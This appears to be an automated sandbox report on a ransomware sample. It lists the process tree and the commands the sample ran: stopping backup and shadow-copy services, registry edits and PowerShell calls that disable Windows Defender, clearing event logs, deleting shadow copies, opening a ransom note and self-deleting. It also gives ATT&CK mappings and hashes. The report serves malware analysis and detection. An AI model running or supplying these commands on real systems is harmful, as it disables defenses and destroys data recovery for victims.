\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3768 cmd.exe 464 PING.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2088 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 464 PING.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 6136 powershell.exe 6136 powershell.exe 6136 powershell.exe 5988 powershell.exe 5988 powershell.exe 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 5632 wevtutil.exe Token: SeBackupPrivilege 5632 wevtutil.exe Token: SeSecurityPrivilege 4468 wevtutil.exe Token: SeBackupPrivilege 4468 wevtutil.exe Token: SeSecurityPrivilege 4504 wevtutil.exe Token: SeBackupPrivilege 4504 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2960 wmic.exe Token: SeSecurityPrivilege 2960 wmic.exe Token: SeTakeOwnershipPrivilege 2960 wmic.exe Token: SeLoadDriverPrivilege 2960 wmic.exe Token: SeSystemProfilePrivilege 2960 wmic.exe Token: SeSystemtimePrivilege 2960 wmic.exe Token: SeProfSingleProcessPrivilege 2960 wmic.exe Token: SeIncBasePriorityPrivilege 2960 wmic.exe Token: SeCreatePagefilePrivilege 2960 wmic.exe Token: SeBackupPrivilege 2960 wmic.exe Token: SeRestorePrivilege 2960 wmic.exe Token: SeShutdownPrivilege 2960 wmic.exe Token: SeDebugPrivilege 2960 wmic.exe Token: SeSystemEnvironmentPrivilege 2960 wmic.exe Token: SeRemoteShutdownPrivilege 2960 wmic.exe Token: SeUndockPrivilege 2960 wmic.exe Token: SeManageVolumePrivilege 2960 wmic.exe Token: 33 2960 wmic.exe Token: 34 2960 wmic.exe Token: 35 2960 wmic.exe Token: 36 2960 wmic.exe Token: SeIncreaseQuotaPrivilege 4420 wmic.exe Token: SeSecurityPrivilege 4420 wmic.exe Token: SeTakeOwnershipPrivilege 4420 wmic.exe Token: SeLoadDriverPrivilege 4420 wmic.exe Token: SeSystemProfilePrivilege 4420 wmic.exe Token: SeSystemtimePrivilege 4420 wmic.exe Token: SeProfSingleProcessPrivilege 4420 wmic.exe Token: SeIncBasePriorityPrivilege 4420 wmic.exe Token: SeCreatePagefilePrivilege 4420 wmic.exe Token: SeBackupPrivilege 4420 wmic.exe Token: SeRestorePrivilege 4420 wmic.exe Token: SeShutdownPrivilege 4420 wmic.exe Token: SeDebugPrivilege 4420 wmic.exe Token: SeSystemEnvironmentPrivilege 4420 wmic.exe Token: SeRemoteShutdownPrivilege 4420 wmic.exe Token: SeUndockPrivilege 4420 wmic.exe Token: SeManageVolumePrivilege 4420 wmic.exe Token: 33 4420 wmic.exe Token: 34 4420 wmic.exe Token: 35 4420 wmic.exe Token: 36 4420 wmic.exe Token: SeIncreaseQuotaPrivilege 4420 wmic.exe Token: SeSecurityPrivilege 4420 wmic.exe Token: SeTakeOwnershipPrivilege 4420 wmic.exe Token: SeLoadDriverPrivilege 4420 wmic.exe Token: SeSystemProfilePrivilege 4420 wmic.exe Token: SeSystemtimePrivilege 4420 wmic.exe Token: SeProfSingleProcessPrivilege 4420 wmic.exe Token: SeIncBasePriorityPrivilege 4420 wmic.exe Token: SeCreatePagefilePrivilege 4420 wmic.exe Token: SeBackupPrivilege 4420 wmic.exe Token: SeRestorePrivilege 4420 wmic.exe Token: SeShutdownPrivilege 4420 wmic.exe Token: SeDebugPrivilege 4420 wmic.exe Token: SeSystemEnvironmentPrivilege 4420 wmic.exe Token: SeRemoteShutdownPrivilege 4420 wmic.exe Token: SeUndockPrivilege 4420 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5000 wrote to memory of 4304 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 91 PID 5000 wrote to memory of 4304 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 91 PID 5000 wrote to memory of 4304 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 91 PID 4304 wrote to memory of 4376 4304 net.exe 93 PID 4304 wrote to memory of 4376 4304 net.exe 93 PID 4304 wrote to memory of 4376 4304 net.exe 93 PID 5000 wrote to memory of 4452 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 94 PID 5000 wrote to memory of 4452 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 94 PID 5000 wrote to memory of 4452 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 94 PID 4452 wrote to memory of 4560 4452 net.exe 96 PID 4452 wrote to memory of 4560 4452 net.exe 96 PID 4452 wrote to memory of 4560 4452 net.exe 96 PID 5000 wrote to memory of 4496 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 98 PID 5000 wrote to memory of 4496 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 98 PID 5000 wrote to memory of 4496 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 98 PID 4496 wrote to memory of 4504 4496 net.exe 100 PID 4496 wrote to memory of 4504 4496 net.exe 100 PID 4496 wrote to memory of 4504 4496 net.exe 100 PID 5000 wrote to memory of 1336 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 101 PID 5000 wrote to memory of 1336 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 101 PID 5000 wrote to memory of 1336 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 101 PID 1336 wrote to memory of 2776 1336 net.exe 103 PID 1336 wrote to memory of 2776 1336 net.exe 103 PID 1336 wrote to memory of 2776 1336 net.exe 103 PID 5000 wrote to memory of 4832 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 104 PID 5000 wrote to memory of 4832 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 104 PID 5000 wrote to memory of 4832 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 104 PID 4832 wrote to memory of 4788 4832 net.exe 106 PID 4832 wrote to memory of 4788 4832 net.exe 106 PID 4832 wrote to memory of 4788 4832 net.exe 106 PID 5000 wrote to memory of 4772 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 107 PID 5000 wrote to memory of 4772 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 107 PID 5000 wrote to memory of 4772 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 107 PID 4772 wrote to memory of 4704 4772 net.exe 109 PID 4772 wrote to memory of 4704 4772 net.exe 109 PID 4772 wrote to memory of 4704 4772 net.exe 109 PID 5000 wrote to memory of 836 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 110 PID 5000 wrote to memory of 836 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 110 PID 5000 wrote to memory of 836 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 110 PID 836 wrote to memory of 5296 836 net.exe 112 PID 836 wrote to memory of 5296 836 net.exe 112 PID 836 wrote to memory of 5296 836 net.exe 112 PID 5000 wrote to memory of 2288 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 113 PID 5000 wrote to memory of 2288 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 113 PID 5000 wrote to memory of 2288 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 113 PID 2288 wrote to memory of 4616 2288 net.exe 115 PID 2288 wrote to memory of 4616 2288 net.exe 115 PID 2288 wrote to memory of 4616 2288 net.exe 115 PID 5000 wrote to memory of 4896 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 116 PID 5000 wrote to memory of 4896 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 116 PID 5000 wrote to memory of 4896 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 116 PID 5000 wrote to memory of 3152 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 118 PID 5000 wrote to memory of 3152 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 118 PID 5000 wrote to memory of 3152 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 118 PID 5000 wrote to memory of 4508 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 121 PID 5000 wrote to memory of 4508 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 121 PID 5000 wrote to memory of 4508 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 121 PID 5000 wrote to memory of 5144 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 123 PID 5000 wrote to memory of 5144 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 123 PID 5000 wrote to memory of 5144 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 123 PID 5000 wrote to memory of 2592 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 125 PID 5000 wrote to memory of 2592 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 125 PID 5000 wrote to memory of 2592 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 125 PID 5000 wrote to memory of 5408 5000 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe 127
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:4376
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:4560
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:4504
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵
- System Location Discovery: System Language Discovery
PID:2776
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:4788
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:4704
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:5296
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_2afad" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_2afad" /y3⤵
- System Location Discovery: System Language Discovery
PID:4616
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:3152
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4508
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5144
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2592
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5408
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6072
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_2afad" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4516
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4804
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1108
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:6112
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:5540
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3312
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:5996
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4160
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:5584
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2356
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4868
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:5800
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:5688
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:5804
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:544
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:4220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:5976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:4816
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:5016
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1620
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:5440
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:6024
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4444
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2508
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5084
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:3616
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:4028
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5632
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:3712
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵
- System Location Discovery: System Language Discovery
PID:6108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6136
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:6012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5988
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\kKwV_HOW_TO_DECRYPT.txt2⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:2088
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe"2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3768 -
C:\Windows\SysWOW64\PING.EXEping.exe -n 5 127.0.0.13⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:464
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Impair Defenses
3Disable or Modify Tools
2Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD558a8dba0fbb2a4f513f20d72372eb870
SHA1ea6654eac929dbd88cc79883568c0abaaeaf92d9
SHA256b233e19504ebb5567c59264e4314703666b5076794a04c603fc79ac669d84fe9
SHA512e11fce909c220b0bd3a19e3adae0f96415521411fd8d391b1a9a3c4d8877c40c7a25846d449b22507e9ea02ae507a3e0f7b6131c0d5ffd774d932f011709ed3e
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD58af64371895ad30c4d921e6f8bef4690
SHA126de901c44de54f3cd8d376300316804e73cb3da
SHA256564e8dc9f9fedc334cc675877b89658d2f6946f093432a53dbc9176f17dae74d
SHA512bd5237fbcc7c406d290db13bbc478e7bdcf0abc6b07744df90081dbbe595df7482c8af3db8e7915bce3f493b2289ccd4ec962f99be080194e5f2e696dea9d6dc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82